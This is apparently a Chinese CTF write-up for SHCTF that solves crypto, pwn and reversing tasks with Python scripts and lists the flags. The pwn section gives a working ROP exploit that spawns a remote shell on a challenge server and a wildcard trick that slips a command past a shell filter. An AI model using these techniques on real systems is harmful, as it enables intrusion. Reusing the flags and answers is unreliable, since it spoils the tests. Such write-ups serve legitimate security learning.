Crypto
说山河这个难度像newstar第2周,不过newstar第2周也不难
EzAES
AES-CBC,key 和 iv 都直接给了,按给定参数解密即可。
Hello Crypto
略,newstar第1周的题
baby_mod
关于模。RSA 给出 hint:leak = p*r - q*t - tmp,tmp 很小(题面说 16 位,脚本实际只枚举 2^12–2^15 之间的素数)可以爆破。两边模 t 后 q*t 这一项消失,得到 (leak + tmp) ≡ p*r (mod t),再乘上 r 模 t 的逆元就得到 p mod t;它要恰好等于 p 需要 p < t,这一点要由题目参数保证。
# baby_mod: the hint is leak = p*r - q*t - tmp with a small prime tmp.
# Reducing modulo t removes the q*t term, so (leak + tmp) * r^-1 == p (mod t);
# that equals p itself only when p < t (assumed by this script -- confirm
# against the task parameters).  tmp is scanned over the primes in
# (2^12, first prime >= 2^15], exactly as the original loop did.
r_inv = invert(r, t)
cand = 1 << 12
while cand < (1 << 15):
    cand = next_prime(cand)
    p = ((leak + cand) % t) * r_inv % t
    if not isPrime(p):
        continue
    # Every prime-looking candidate is printed (no break); pick the one whose
    # decryption is readable.  Decrypting mod p alone is only meaningful if the
    # challenge encrypted under p (or m < p) -- assumption, verify with the task.
    print(p, long_to_bytes(pow(c, invert(65537, p - 1), p)))
#(leak_tmp)%r = -qt%r = -q + t%r
#SHCTF{992cd020-c077-4322-b725-42abb07351c8}
d_known
已知 d 求 n。由于 e*d = 1 + k*phi 且 k*phi < e*d,所以 k < e:e 很小时 k 也很小,可以直接爆破 k 得到 phi;然后取 phi 的整数平方根往上的第一个素数当作一个因子试除(这只在 p、q 位数相同且都紧挨着 sqrt(phi) 时成立)。如果 e 很大需要换更快的方法。
# d_known: only (e, d, c) are given.  e*d - 1 = k*phi with k < e, so for small e
# the multiplier k is brute-forced.  For each candidate phi the factor guess is
# next_prime(isqrt(phi)); this relies on p and q being of equal size and
# straddling sqrt(phi) tightly (heuristic, not guaranteed).
k_phi = e * d - 1
for k in range(1, e):
    if k_phi % k:
        continue
    phi_guess = k_phi // k
    q_guess = next_prime(iroot(phi_guess, 2)[0])
    if phi_guess % (q_guess - 1) != 0:
        continue
    p_guess = phi_guess // (q_guess - 1) + 1
    if not isPrime(p_guess):
        continue
    # Every surviving (p, q) pair is printed; the readable one is the answer.
    n = q_guess * p_guess
    print(long_to_bytes(pow(c, d, n)))
factor
先用 yafu 把 N 分解出因子(下面是 10 个 19–20 位、约 64 bit 的素数;因子这么小 yafu 才能快速分出来,这正是多素数 RSA 选小因子的问题),再枚举其中 7 个因子的组合当作真正的模数去解密,用明文里是否含 SHCTF 来判断哪个组合是对的。
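# factor: yafu split N into ten 19/20-digit (~64-bit) primes.  Factors that
# small are why the modulus falls; what remains is finding which subset of them
# is the modulus c was actually encrypted under.
c = 18946548191938794864120361152574240388523945335296788837228348770322181581321602403615828138512043894011421076284003608755553490004627
N = 226135023770816618701618151846421847572902900031980838045326364286384135892650486405452233420434737106090920032098983593807060471503312296505342841682345021773470258125278766612640823497674061
# yafu output:
#   P20 = 17166246869917049249
#   P20 = 17777149920361894319
#   P20 = 18396972868824670501
#   P19 = 9295485268086191407
#   P20 = 12446738783004209609
#   P19 = 9382735014592024387
#   P20 = 11432032909142176543
#   P20 = 11809257221756593327
#   P20 = 15184368613455131963
#   P20 = 18100230049134917857
# NOTE(review): worth checking math.prod(ps) == N before trusting the list.
ps = [17166246869917049249, 17777149920361894319, 18396972868824670501, 9295485268086191407, 12446738783004209609, 9382735014592024387, 11432032909142176543, 11809257221756593327, 15184368613455131963, 18100230049134917857]


def find_flag_subsets(c, primes, size=7, e=65537, marker=b'SHCTF'):
    """Try every `size`-subset of `primes` as the RSA modulus and return the
    decryptions that contain `marker`.

    Args:
        c: ciphertext as an integer.
        primes: candidate prime factors of the modulus.
        size: how many primes make up one candidate modulus.  The original
            script fixed this at 7 because c has ~134 digits, i.e. seven
            ~19-digit factors.
        e: public exponent.
        marker: byte string expected somewhere in the plaintext.

    Returns:
        List of (modulus, plaintext_bytes) pairs whose plaintext contains
        `marker`.  Subsets whose modulus does not exceed c (c could not be a
        valid ciphertext mod n) or whose phi is not coprime to e are skipped
        instead of raising.
    """
    import itertools
    import math

    hits = []
    for subset in itertools.combinations(primes, size):
        n = math.prod(subset)
        if n <= c:
            continue
        phi = math.prod(p - 1 for p in subset)
        if math.gcd(e, phi) != 1:
            continue
        d = pow(e, -1, phi)          # modular inverse, Python 3.8+
        m = pow(c, d, n)
        plain = m.to_bytes((m.bit_length() + 7) // 8, 'big')
        if marker in plain:
            hits.append((n, plain))
    return hits


if __name__ == '__main__':
    for n, flag in find_flag_subsets(c, ps):
        print(flag)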
PWN
指令执行器
同newstar week asm那题shell里作个syscall
签个到吧
命令过滤绕过:/bin/c?t fla?>&0 —— 用 shell 通配符 ? 让命令行里不出现被过滤的字面量(推测过滤的是 cat / flag 这类字符串);>&0 把标准输出重定向到 fd 0,这类由 socket 承载的远程 shell 里 fd 0 通常是双向的,所以输出照样能回到客户端,即使 stdout 被关掉也能拿到结果。
No stack overflow1
溢出到后门
No stack overflow2
溢出先泄露libc再system(/bin/sh)
No stack overflow2 pro
程序里有 syscall gadget(看 gadget 地址应该是静态链接,没有 system 可调),所以先用 read 把 /bin/sh 写到 bss,再 execve(bss, 0, 0) 起 shell。
from pwn import *

# No stack overflow2 pro: the binary has no system()/"/bin/sh" but does have a
# syscall gadget, so stage 1 read()s "/bin/sh\0" into .bss and stage 2
# execve()s it.  All addresses are for this exact build of ./vuln5.
context(arch='amd64', log_level='debug')
elf = ELF('./vuln5')

pop_rdi = 0x4022bf      # pop rdi ; ret
pop_rsi = 0x40a32e      # pop rsi ; ret
pop_rdx_rbx = 0x49d06b  # pop rdx ; pop rbx ; ret   (rbx receives a dummy 0)
pop_rax = 0x4507f7      # pop rax ; ret
syscall = 0x44f409      # syscall
bss = 0x4e8d00          # writable scratch space for the "/bin/sh" string

SYS_read, SYS_execve = 0, 59
SHELL_LEN = 8           # len(b'/bin/sh\0')

# read(0, bss, 8)
stage_read = [pop_rdi, 0, pop_rsi, bss, pop_rdx_rbx, SHELL_LEN, 0, pop_rax, SYS_read, syscall]
# execve(bss, NULL, NULL)
stage_exec = [pop_rdi, bss, pop_rsi, 0, pop_rdx_rbx, 0, 0, pop_rax, SYS_execve, syscall]
# 0x100 bytes of filler, one qword of 0 (presumably the saved rbp), then the chain.
payload = b'A' * 0x100 + flat(0, stage_read, stage_exec)

io = remote('entry.shc.tf', 43778)
# NOTE(review): 0x80000100 presumably slips past the size check (e.g. negative
# when compared as a signed 32-bit value) while still letting the read run
# long -- verify against the binary's check before reusing this.
io.sendlineafter(b"size: \n", str(0x80000100).encode())
io.sendafter(b"input: \n", payload)
sleep(0.5)              # let the chain reach read() before the string arrives
io.send(b'/bin/sh\0')
io.interactive()
REV
EzDBG
这题有点意思,先是作不出来,然后问了出题人,说是弄难了,然后更新了附件,就OK了。
题目给的是个 .dmp 文件,也就是进程内存 dump(应是 minidump 格式),有点像取证题,用 010 Editor 的模板可以看到各个流和内存块的位置。里边有 6 个 module 记录,只存着模块名没啥用;下面的 Memory64List 流记录了每个内存块的大小和在文件中的偏移,按它就能从文件中切出各块。这些块是程序运行时的内存,所以里边保存着程序的代码和数据(一个程序往往对应多个连续的块)。
在块 22 里找到要求输入 flag 的提示字符串,它前面的块 21 是程序代码,切出来丢进 IDA 反编译,得到加密方法是逐字节异或 0x66。
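# EzDBG: the dumped program XORs the flag with the single byte 0x66.  Instead
# of reversing the whole dump, XOR the known flag prefix and search the dump
# for the resulting bytes; in this dump the ciphertext sits at 0x1715c9.
#   >>> xor(b'SHCTF{', b'\x66')
#   b'5.%2 \x1d'

FLAG_PREFIX = b'SHCTF{'
XOR_KEY = 0x66
FLAG_LEN = 39           # 'SHCTF{' + 32 hex chars + '}'


def xor_single(data, key):
    """XOR every byte of `data` with the one-byte integer `key`."""
    return bytes(b ^ key for b in data)


def find_flag(dump, key=XOR_KEY, prefix=FLAG_PREFIX, length=FLAG_LEN, offset=None):
    """Locate and decode a single-byte-XORed flag inside a memory dump.

    Args:
        dump: raw bytes of the .dmp file.
        key: XOR key byte (0x66 for this task).
        prefix: known plaintext prefix; when `offset` is None the dump is
            searched for prefix XOR key.
        length: flag length in bytes.
        offset: explicit ciphertext offset, skipping the search.

    Returns:
        Decoded flag bytes, or None when the prefix pattern is not found.
    """
    if offset is None:
        offset = dump.find(xor_single(prefix, key))
        if offset < 0:
            return None
    return xor_single(dump[offset:offset + length], key)


if __name__ == '__main__':
    # msg holds the .dmp contents read earlier in the script.
    print(find_flag(msg, offset=0x1715c9))
    # b'SHCTF{e8a0fe1156f2afaafe6d788e9d0e1f66}'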
ezapk
得到加密方法
// Decompiled from the APK.  Per character: XOR with the repeating key byte,
// add 6, double, truncate to a Java char; the chars are then UTF-8 encoded and
// Base64'd.  For letters and most printable ASCII ((c ^ k) + 6) * 2 exceeds
// 0x7F, so those chars become two UTF-8 bytes -- a decoder must Base64-decode
// and UTF-8-decode before undoing the arithmetic.
public static String Encode(String str, byte[] bArr) {
StringBuilder sb = new StringBuilder();
for (int i = 0; i < str.length(); i++) {
// c' = (char) (((c ^ bArr[i % len]) + 6) * 2); each (char) cast truncates to 16 bits
sb.append((char) (((char) (((char) (str.charAt(i) ^ bArr[i % bArr.length])) + 6)) * 2));
}
return Base64.getEncoder().encodeToString(sb.toString().getBytes(StandardCharsets.UTF_8));
}
解出一堆乱码,提交居然正确
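# ezapk: invert Encode() above -- Base64 -> UTF-8 string -> per char
# (ord(ch) // 2 - 6) ^ key[i % len(key)].
key = [12, 15, 25, 30, 36]
a = "woLDgMOgw7hEwoJQw7zDtsKow7TDpMOMZMOow75QxIbDnsKmw6Z4UMK0w7rCklDCrMKqwqbDtMOOw6DDsg=="


def decode_ezapk(cipher_b64, key):
    """Invert the APK's Encode(): Base64-decode, UTF-8-decode, then map each
    char c to (ord(c) // 2 - 6) ^ key[i % len(key)].

    Args:
        cipher_b64: Base64 text produced by Encode().
        key: the key bytes Encode() cycled over.

    Returns:
        Plaintext as bytes.

    Raises:
        ValueError: if `key` is empty, or a recovered value falls outside
            0..255 (i.e. key and ciphertext do not belong together).
    """
    import base64

    if not key:
        raise ValueError("key must not be empty")
    chars = base64.b64decode(cipher_b64).decode('utf-8')
    return bytes(((ord(ch) // 2) - 6) ^ key[i % len(key)] for i, ch in enumerate(chars))


if __name__ == '__main__':
    # Looks like gibberish but is the accepted flag body.
    print(decode_ezapk(a, key))
    # b'7Ush87-akjxcy2Ju-dwia9;JSO-IQixnsm'
    # SHCTF{7Ush87-akjxcy2Ju-dwia9;JSO-IQixnsm}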
ezrc4
RC4 是流密码:用密钥流逐字节异或明文,解密就是再异或一次。只要拿到一段已知明文和它对应的密文,异或一下就能恢复出密钥流;同一密钥流(密钥复用)再异或目标密文就得到明文——前提是已知明文不短于要解的密文,密钥流复用正是流密码的典型致命错误。
ezxor
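# ezxor (sub_140014C50): the binary keeps the flag as signed bytes XORed with
# a repeating 3-byte key.  IDA prints the array as signed chars (-61 == 0xC3),
# hence the 8-bit masking below.
v9 = [-61, 105, 114, -60, 103, 74, -24, 17, 67, -49, 111, 0, -13, 68, 110, -8, 89, 73, -24, 78, 94, -30, 83, 67, -79, 92]
x = [0x90, 0x21, 0x31]


def xor_decode(data, key):
    """XOR `data` with the repeating `key` and return the result as bytes.

    Args:
        data: ints, possibly negative (decompiler signed-char output).
        key: ints 0..255 cycled over `data`.

    Returns:
        bytes of len(data); the original hard-coded length 26.

    Raises:
        ValueError: if `key` is empty.
    """
    if not key:
        raise ValueError("key must not be empty")
    return bytes(((b & 0xff) ^ key[i % len(key)]) & 0xff for i, b in enumerate(data))


if __name__ == '__main__':
    print(xor_decode(v9, x))
    # b'SHCTF{x0r_N1ce_hxxxoorrr!}'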
gamegame
是个数独(题目把 9×9 格子按每格 4 字节存在可执行文件 0x2600 处),SageMath 自带数独求解函数;flag 就是解出来后原先空格位置上的数字按行拼起来。
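# gamegame: the binary embeds a 9x9 sudoku as 81 cells of 4 bytes each at
# 0x2600; the flag is the solved grid's digits at the originally empty cells,
# row by row.  Solving was done with SageMath's sudoku solver.


def read_puzzle(path, offset=0x2600, cells=81, stride=4):
    """Extract the puzzle cells from the binary.

    Only the first byte of each `stride`-byte cell is used, exactly as the
    original one-liner did (presumably little-endian int32 cells -- confirm).
    The file is closed after reading (the original leaked the handle).
    """
    with open(path, 'rb') as fh:
        fh.seek(offset)
        blob = fh.read(cells * stride)
    return list(blob[0:cells * stride:stride])


def flag_from_solution(puzzle, solution):
    """Return the solution digits at every cell the puzzle left blank (0).

    Args:
        puzzle: 81 ints in row-major order, 0 meaning blank.
        solution: 81-char digit string, the solved grid in row-major order.

    Raises:
        ValueError: if the lengths differ or a given clue disagrees with the
            solution (catches a mis-pasted grid).
    """
    if len(puzzle) != len(solution):
        raise ValueError("puzzle and solution differ in length")
    for clue, sol in zip(puzzle, solution):
        if clue and str(clue) != sol:
            raise ValueError("solution contradicts a given clue")
    return ''.join(sol for clue, sol in zip(puzzle, solution) if clue == 0)


# Puzzle as extracted from r5_sudoku.exe.
sd = [5, 3, 0, 0, 7, 0, 0, 0, 0, 6, 0, 0, 1, 9, 5, 0, 0, 0, 0, 9, 8, 0, 0, 0, 0, 6, 0, 8, 0, 0, 0, 6, 0, 0, 0, 3, 4, 0, 0, 8, 0, 3, 0, 0, 1, 7, 0, 0, 0, 2, 0, 0, 0, 6, 0, 6, 0, 0, 0, 0, 2, 8, 0, 0, 0, 0, 4, 1, 9, 0, 0, 5, 0, 0, 0, 0, 8, 0, 0, 7, 9]
# Sage solution:
#   [5 3 4 6 7 8 9 1 2]
#   [6 7 2 1 9 5 3 4 8]
#   [1 9 8 3 4 2 5 6 7]
#   [8 5 9 7 6 1 4 2 3]
#   [4 2 6 8 5 3 7 9 1]
#   [7 1 3 9 2 4 8 5 6]
#   [9 6 1 5 3 7 2 8 4]
#   [2 8 7 4 1 9 6 3 5]
#   [3 4 5 2 8 6 1 7 9]
a = '534678912672195348198342567859761423426853791713924856961537284287419635345286179'
b = flag_from_solution(sd, a)
# shctf{468912723481342575971422657913948591537428763345261}

if __name__ == '__main__':
    print(b)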